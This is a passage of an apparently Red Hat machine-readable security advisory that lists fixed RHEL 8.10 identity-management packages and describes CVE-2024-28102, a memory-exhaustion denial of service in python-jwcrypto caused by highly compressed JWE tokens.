"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "JWCrypto: denail of service Via specifically crafted JWE"
},
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
